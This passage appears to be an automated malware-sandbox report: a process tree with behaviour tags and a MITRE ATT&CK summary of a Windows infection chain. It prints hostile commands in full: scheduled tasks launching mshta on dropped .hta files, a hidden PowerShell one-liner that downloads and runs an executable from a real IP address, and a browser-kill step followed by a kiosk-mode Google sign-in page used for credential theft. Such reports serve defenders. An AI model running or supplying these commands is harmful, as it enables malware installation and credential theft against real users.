- Suspicious use of AdjustPrivilegeToken
PID:4512
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:5356 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4812
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:5368 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:72
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "RDro5malfmZ" /tr "mshta \"C:\Temp\DZx0zsVul.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5636
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\DZx0zsVul.hta"5⤵PID:5540
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;6⤵
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5804 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3244
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1090370001\ebp51gY.exe"C:\Users\Admin\AppData\Local\Temp\1090370001\ebp51gY.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4432
-
-
C:\Users\Admin\AppData\Local\Temp\1090372001\a8a5b07bf4.exe"C:\Users\Admin\AppData\Local\Temp\1090372001\a8a5b07bf4.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5208 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵PID:412
-
-
-
C:\Users\Admin\AppData\Local\Temp\1090373001\d74640f13d.exe"C:\Users\Admin\AppData\Local\Temp\1090373001\d74640f13d.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1692
-
-
C:\Users\Admin\AppData\Local\Temp\1090374001\afaefd507f.exe"C:\Users\Admin\AppData\Local\Temp\1090374001\afaefd507f.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3792
-
-
C:\Users\Admin\AppData\Local\Temp\1090375001\67152b305c.exe"C:\Users\Admin\AppData\Local\Temp\1090375001\67152b305c.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5944 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:5580
-
-
-
C:\Users\Admin\AppData\Local\Temp\1090376001\d35ce9d381.exe"C:\Users\Admin\AppData\Local\Temp\1090376001\d35ce9d381.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1076
-
-
C:\Users\Admin\AppData\Local\Temp\1090377001\33f82ae2b0.exe"C:\Users\Admin\AppData\Local\Temp\1090377001\33f82ae2b0.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2680 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
PID:3960
-
-
-
C:\Users\Admin\AppData\Local\Temp\1090378001\1cc9b19df2.exe"C:\Users\Admin\AppData\Local\Temp\1090378001\1cc9b19df2.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:3116 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3116 -s 15964⤵
- Program crash
PID:1092
-
-
-
C:\Users\Admin\AppData\Local\Temp\1090379001\5a903ed074.exe"C:\Users\Admin\AppData\Local\Temp\1090379001\5a903ed074.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3244
-
-
C:\Users\Admin\AppData\Local\Temp\1090380001\b91b4b1726.exe"C:\Users\Admin\AppData\Local\Temp\1090380001\b91b4b1726.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:2436
-
-
C:\Users\Admin\AppData\Local\Temp\1090381001\54352f7f9d.exe"C:\Users\Admin\AppData\Local\Temp\1090381001\54352f7f9d.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SendNotifyMessage
PID:1752 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1884
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4892
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1016
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5932
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5660
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:6004
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:912 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1900 -parentBuildID 20240401114208 -prefsHandle 1812 -prefMapHandle 1804 -prefsLen 27211 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {68e021b4-e545-4ac6-bad1-9c64d02848f2} 912 "\\.\pipe\gecko-crash-server-pipe.912" gpu6⤵PID:2984
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2360 -parentBuildID 20240401114208 -prefsHandle 2336 -prefMapHandle 2324 -prefsLen 28131 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ec4c3bcc-ff30-4343-bc9d-30f975e6b7f0} 912 "\\.\pipe\gecko-crash-server-pipe.912" socket6⤵PID:1004
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3412 -childID 1 -isForBrowser -prefsHandle 3404 -prefMapHandle 3400 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0af34d6-4aba-4293-a34c-9238702c3b62} 912 "\\.\pipe\gecko-crash-server-pipe.912" tab6⤵PID:2292
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3980 -childID 2 -isForBrowser -prefsHandle 3788 -prefMapHandle 1080 -prefsLen 32621 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {20ca008b-beae-4e97-90c8-82241f0da7f0} 912 "\\.\pipe\gecko-crash-server-pipe.912" tab6⤵PID:4260
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4540 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4800 -prefMapHandle 4648 -prefsLen 32621 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {78f23c1f-147b-4129-9ed5-8c6a46f70d78} 912 "\\.\pipe\gecko-crash-server-pipe.912" utility6⤵
- Checks processor information in registry
PID:2368
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5488 -childID 3 -isForBrowser -prefsHandle 5480 -prefMapHandle 5476 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {83f1e9fa-1c17-4277-a318-aae0683aa254} 912 "\\.\pipe\gecko-crash-server-pipe.912" tab6⤵PID:6372
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5620 -childID 4 -isForBrowser -prefsHandle 5628 -prefMapHandle 5632 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7eb44f95-1ae3-4059-872d-9e9b9869bc19} 912 "\\.\pipe\gecko-crash-server-pipe.912" tab6⤵PID:6384
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5820 -childID 5 -isForBrowser -prefsHandle 5832 -prefMapHandle 5836 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {55543cf6-977b-47c3-b761-355e527b5bcc} 912 "\\.\pipe\gecko-crash-server-pipe.912" tab6⤵PID:6396
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4960 -childID 6 -isForBrowser -prefsHandle 3504 -prefMapHandle 3520 -prefsLen 27276 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2faa602b-41a3-4a60-99e0-7660aa23dbb6} 912 "\\.\pipe\gecko-crash-server-pipe.912" tab6⤵PID:5244
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6164 -childID 7 -isForBrowser -prefsHandle 6156 -prefMapHandle 6152 -prefsLen 27276 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cb96bed0-141a-4179-9d3f-050adbba8374} 912 "\\.\pipe\gecko-crash-server-pipe.912" tab6⤵PID:6360
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6080 -parentBuildID 20240401114208 -prefsHandle 6088 -prefMapHandle 5708 -prefsLen 33150 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {034a014a-7c2c-4239-be15-54b39419bd87} 912 "\\.\pipe\gecko-crash-server-pipe.912" rdd6⤵PID:6688
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6072 -parentBuildID 20240401114208 -sandboxingKind 1 -prefsHandle 5788 -prefMapHandle 5784 -prefsLen 33150 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bba17b7f-303a-4154-9c87-871dbbb9b69b} 912 "\\.\pipe\gecko-crash-server-pipe.912" utility6⤵
- Checks processor information in registry
PID:6976
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1090382001\85e559204e.exe"C:\Users\Admin\AppData\Local\Temp\1090382001\85e559204e.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SendNotifyMessage
PID:1404 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn mcNxtmaBsXa /tr "mshta C:\Users\Admin\AppData\Local\Temp\dIi8d4euv.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
PID:2132 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn mcNxtmaBsXa /tr "mshta C:\Users\Admin\AppData\Local\Temp\dIi8d4euv.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1908
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\dIi8d4euv.hta4⤵
- System Location Discovery: System Language Discovery
PID:4008 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P38TDZ3N0DXTVKH63N3AOQ5IBQLFYYV0.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;5⤵
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious use of AdjustPrivilegeToken
PID:1996 -
C:\Users\Admin\AppData\Local\TempP38TDZ3N0DXTVKH63N3AOQ5IBQLFYYV0.EXE"C:\Users\Admin\AppData\Local\TempP38TDZ3N0DXTVKH63N3AOQ5IBQLFYYV0.EXE"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6200
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1090383001\1e56a29b0d.exe"C:\Users\Admin\AppData\Local\Temp\1090383001\1e56a29b0d.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:6676
-
-
C:\Users\Admin\AppData\Local\Temp\1090384001\ebp51gY.exe"C:\Users\Admin\AppData\Local\Temp\1090384001\ebp51gY.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4696
-
-
C:\Users\Admin\AppData\Local\Temp\1090385001\DTQCxXZ.exe"C:\Users\Admin\AppData\Local\Temp\1090385001\DTQCxXZ.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6984
-
-
C:\Users\Admin\AppData\Local\Temp\1090386001\7nSTXG6.exe"C:\Users\Admin\AppData\Local\Temp\1090386001\7nSTXG6.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4956 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:5096
-
-
-
C:\Users\Admin\AppData\Local\Temp\1090387001\fa829ac30d.exe"C:\Users\Admin\AppData\Local\Temp\1090387001\fa829ac30d.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6680
-
-
C:\Users\Admin\AppData\Local\Temp\1090388001\26da168d66.exe"C:\Users\Admin\AppData\Local\Temp\1090388001\26da168d66.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3808
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2832 -ip 28321⤵PID:2260
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3740 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff91609cc40,0x7ff91609cc4c,0x7ff91609cc582⤵PID:3628
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1888,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1884 /prefetch:22⤵PID:5524
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2032,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2108 /prefetch:32⤵PID:5308
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2200,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2116 /prefetch:82⤵PID:4860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3120,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3176 /prefetch:12⤵PID:2248
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3164,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3324 /prefetch:12⤵PID:5512
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4468,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4276 /prefetch:12⤵PID:6020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3168,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4584 /prefetch:82⤵PID:5996
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4724,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4564 /prefetch:82⤵PID:5980
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4728,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4868 /prefetch:82⤵PID:4404
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4592,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5020 /prefetch:82⤵PID:3040
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4960,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4992 /prefetch:82⤵PID:4600
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4828,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4948 /prefetch:82⤵PID:5468
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:4264
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.131⤵
- Modifies registry class
PID:5652
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:4624
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 852 -ip 8521⤵PID:4272
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1408 -ip 14081⤵PID:1096
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3992
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:1572
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004E8 0x00000000000004E01⤵PID:5260
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:1408
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:5540
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3588
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:5368
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3116 -ip 31161⤵PID:1884
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 568 -p 1560 -ip 15601⤵PID:5324
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4148
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4884
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6048
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Modify Authentication Process
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Authentication Process
1Modify Registry
6Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
5Credentials In Files
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
288KB
